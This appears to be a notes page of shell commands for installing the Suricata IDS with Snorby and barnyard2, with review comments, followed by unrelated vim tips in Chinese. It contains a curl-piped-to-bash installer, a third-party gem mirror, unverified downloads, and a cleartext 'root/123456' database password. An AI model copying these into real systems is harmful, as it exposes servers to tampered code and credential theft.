./configure --enable-nfqueue --enable-pfring --enable-hiredis --prefix=/usr --sysconfdir=/etc --localstatedir=/var --enable-unittests --enable-python --enable-debug --enable-debug-validation --enable-profiling --enable-profiling-locks --enable-lua --enable-geoip --enable-pie --enable-prelude
make
make install
make install-conf
make install-rules
ldconfig

# Comment out the "windows: [0.0.0.0/0]" entry (presumably under
# host-os-policy) and switch on unified2 output, which is the format the
# barnyard2 instance installed below reads (-f unified2.alert).
sed -i "s|windows: [0.0.0.0/0].*|#windows: [0.0.0.0/0]|g" /etc/suricata/suricata.yaml
perl -0777 -i -pe  "s/- unified2-alert:\s*enabled:.*/- unified2-alert:\n      enabled: yes/g" /etc/suricata/suricata.yaml


#install suricata end

#install snorby begin
# RVM signing key, then the installer piped straight into bash. The installer
# itself is fetched unpinned; the imported key only helps if the installer
# verifies the RVM tarball signature — TODO confirm for the "stable" script.
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
curl -sSL https://get.rvm.io | bash -s stable

source /etc/profile.d/rvm.sh

rvm install ruby-2.2.4
rvm use ruby-2.2.4 --default

# Replaces the official gem source with a third-party mirror: every gem below
# then comes from whoever operates that mirror. Fine for a lab, not for prod.
gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/

gem install thor i18n bundler tzinfo builder memcache-client rack rack-test erubis mail rack-mount rails sqlite3 arel ezprint rake activesupport minitest

bundle config mirror.https://rubygems.org https://gems.ruby-china.org

# Plain http:// clone (GitHub redirects to https, but the first hop is
# cleartext) of an unpinned HEAD.
git clone http://github.com/Snorby/snorby.git --depth=1 /var/www/snorby
cp /var/www/snorby/config/database.yml.example /var/www/snorby/config/database.yml
cp /var/www/snorby/config/snorby_config.yml.example /var/www/snorby/config/snorby_config.yml
# The escaped quotes matter: an unquoted 123456 is a YAML integer, which is the
# "no implicit conversion of Fixnum into String" failure described at the top
# of this page. The password is still written in cleartext here.
sed -i "s/password: .*\$/password: \"123456\"/" /var/www/snorby/config/database.yml
sed -i "s/domain: .*\$/domain: 'localhost:3000'/" /var/www/snorby/config/snorby_config.yml
sed -i "s/wkhtmltopdf: .*\$/wkhtmltopdf: wkhtmltopdf/" /var/www/snorby/config/snorby_config.yml
sed -i "s#rules:#rules: \n    - \"/etc/suricata/rules/\"#g" /var/www/snorby/config/snorby_config.yml


cd /var/www/snorby/ && bundle update activesupport railties rails
cd /var/www/snorby/ && bundle install
cd /var/www/snorby/ && bundle exec rake snorby:setup RAILS_ENV=production

chown www-data:www-data /var/www/snorby -R
# ">>" appends: a second run leaves two vhost definitions in the file. The
# site is served on *:80 without TLS and "Allow from all" — restrict the
# source range or front it with HTTPS before it leaves the lab.
cat <<EOT >> /etc/apache2/sites-available/snorby.conf
<VirtualHost *:80>
        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/snorby/public

        <Directory "/var/www/snorby/public">
                AllowOverride all
                Order deny,allow
                Allow from all
                Options -MultiViews
        </Directory>

</VirtualHost>
EOT

a2dissite 000-default.conf
a2ensite snorby.conf

# --no-ri/--no-rdoc are the pre-2.x spellings of --no-document.
gem install --no-ri --no-rdoc passenger
cd /var/www/snorby/ && passenger-install-apache2-module -a 2> /tmp/.passenger_error.txt 1> /tmp/.passenger_compile_out
sed -n '/LoadModule passenger_module \/usr\//,/<\/IfModule>/p' /tmp/.passenger_compile_out > /etc/apache2/mods-available/passenger.load
a2enmod passenger 
a2enmod rewrite
service apache2 restart
cd /var/www/snorby/ && bundle pack
# NOTE(review): "vender/cache" is presumably a typo for vendor/cache, the
# directory "bundle pack" just populated.
cd /var/www/snorby/ && bundle install --path vender/cache
service apache2 restart
#install snorby end

#install barnyard2 begin
cd /tmp
# Unverified tarball; compare with the checksum snort.org publishes before
# building and installing it as root.
wget -q https://www.snort.org/downloads/snort/daq-2.0.6.tar.gz
if [ -d "/tmp/daq-2.0.6" ]; then
  rm -r /tmp/daq-2.0.6
fi
tar xzf daq-2.0.6.tar.gz
cd daq-2.0.6
./configure && make && make install

# barnyard2 expects dnet.h; Debian ships the same header as dumbnet.h.
ln -s /usr/include/dumbnet.h /usr/include/dnet.h
cd /tmp/ && git clone https://github.com/firnsy/barnyard2 --depth=1
cd barnyard2
./autogen.sh
autoreconf --force --install
./configure --with-mysql --with-mysql-libraries=/usr/lib/x86_64-linux-gnu/
make && make install
cp /tmp/barnyard2/etc/barnyard2.conf /etc/suricata/
sed -i "s/#config interface:\s\+eth0/config interface:  eth0/g" /etc/suricata/barnyard2.conf
sed -i "s/#config daemon/config daemon/g" /etc/suricata/barnyard2.conf
sed -i "s/#config verbose/config verbose/g" /etc/suricata/barnyard2.conf
sed -i "s;#config waldo_file:.*;config waldo_file: /var/log/suricata/suricata.waldo;" /etc/suricata/barnyard2.conf
sed -i "s#config reference_file:\s\+/etc/.*#config reference_file:      /etc/suricata/reference.config#g" /etc/suricata/barnyard2.conf
sed -i "s#config classification_file:\s\+/etc/.*#config classification_file: /etc/suricata/classification.config#g" /etc/suricata/barnyard2.conf
sed -i "s#config gen_file:\s\+/etc/.*#config gen_file:            /etc/suricata/rules/gen-msg.map#g" /etc/suricata/barnyard2.conf
sed -i "s#config sid_file:\s\+/etc/.*#config sid_file:            /etc/suricata/rules/sid-msg.map#g" /etc/suricata/barnyard2.conf
# NOTE(review): the MySQL root password goes into barnyard2.conf in cleartext
# and barnyard2 then runs as DB root. A dedicated account limited to the snorby
# database is the least-privilege shape; also check the mode of the conf file
# after the cp above.
echo "output database: log, mysql, user=root password=123456 dbname=snorby host=localhost sensor_name=sensor1" >> /etc/suricata/barnyard2.conf
mkdir /var/log/barnyard2
# Init script via heredoc. ">>" appends, so a second run glues two scripts
# together with "#!/bin/sh" no longer on line 1. Inside the script: "echo -e"
# under /bin/sh (dash on Debian) prints a literal "-e"; "sudo" is redundant in
# a root-run init script; "killall barnyard2" stops any process by that name,
# not just the one started here.
cat << 'EOT' >> /etc/init.d/barnyard2
#!/bin/sh
case $1 in
    start)
        echo "starting $0..."
        sudo barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo
        echo -e 'done.'
    ;;
    stop)
        echo "stopping $0..."
        killall barnyard2
        echo -e 'done.'
    ;;
    restart)
        $0 stop
        $0 start
    ;;
    *)
        echo "usage: $0 (start|stop|restart)"
    ;;
esac

EOT

chmod 700 /etc/init.d/barnyard2
update-rc.d barnyard2 defaults 21 00
#install barnyard2 end


# Presumably reloads snorby's rule/signature metadata from the rules path
# configured above — confirm against the rake task.
cd /var/www/snorby
bundle exec rake snorby:update RAILS_ENV=production


 


# NOTE(review): this starts suricata as a passive sniffer on eth0 (-i), not on
# the NFQUEUE (-q 0) used for the inline setup earlier on this page. If those
# iptables NFQUEUE rules are still loaded nothing services the queue and the
# queued traffic is dropped. -D daemonises both processes.
suricata -c /etc/suricata/suricata.yaml -i eth0 -D
barnyard2 -c /etc/suricata/barnyard2.conf -d /var/log/suricata -f unified2.alert -w /var/log/suricata/suricata.waldo -D




#开机启动snorby worker

# Boot-time snippet (per the heading, what starts the snorby worker): load RVM
# first so "bundle" resolves to the Ruby 2.2.4 installed above.
source /etc/profile.d/rvm.sh
rvm use ruby-2.2.4 --default

cd /var/www/snorby
bundle exec rake snorby:update RAILS_ENV=production

#mark

VIM mark

#vim的搜索是否区分大小写

#大小写检索:默认是区分大小写的
:set ignorecase 或者 :set ic
#恢复区分大小写:
:set noignorecase 或者 :set noic

#vim中删除不包含关键字的行 刚好与g 命令相反

:g/pattern/d 是找到pattern, 删之
:v/pattern/d 是找到非pattern,删之

#vim中删除关键字的行

:g/xxxx/d
:g/^xxxx/d
:g/xxxx$/d

#修改默认 mouse=v

#文件位置:/usr/share/vim/vim81/defaults.vim
" Shipped defaults.vim setting: mouse=a lets vim take the mouse in every mode.
if has('mouse')
  set mouse=a
endif
#改为
" mouse=v: vim uses the mouse only in visual mode, so the terminal's own
" selection/copy works again.
if has('mouse')
  set mouse=v
endif

#AnsiEsc  终端高亮显示到VIM中(如ls grep等结果中的高亮)

#http://www.vim.org/scripts/script.php?script_id=4979  (新版本地址)
#https://github.com/powerman/vim-plugin-AnsiEsc (github)

wget http://www.vim.org/scripts/download_script.php?src_id=24019

vim AnsiEsc.vmb
:so %

test:
ls -al /etc --color=always > /tmp/a.txt && vim /tmp/a.txt

#编码切换

#先下载fencview.vim到plugin文件夹中
#~/.vim/vimrc 
" Disable fencview's automatic encoding detection.
let g:fencview_autodetect=0
" F2 opens the FencView encoding picker.
map <F2> :FencView<cr>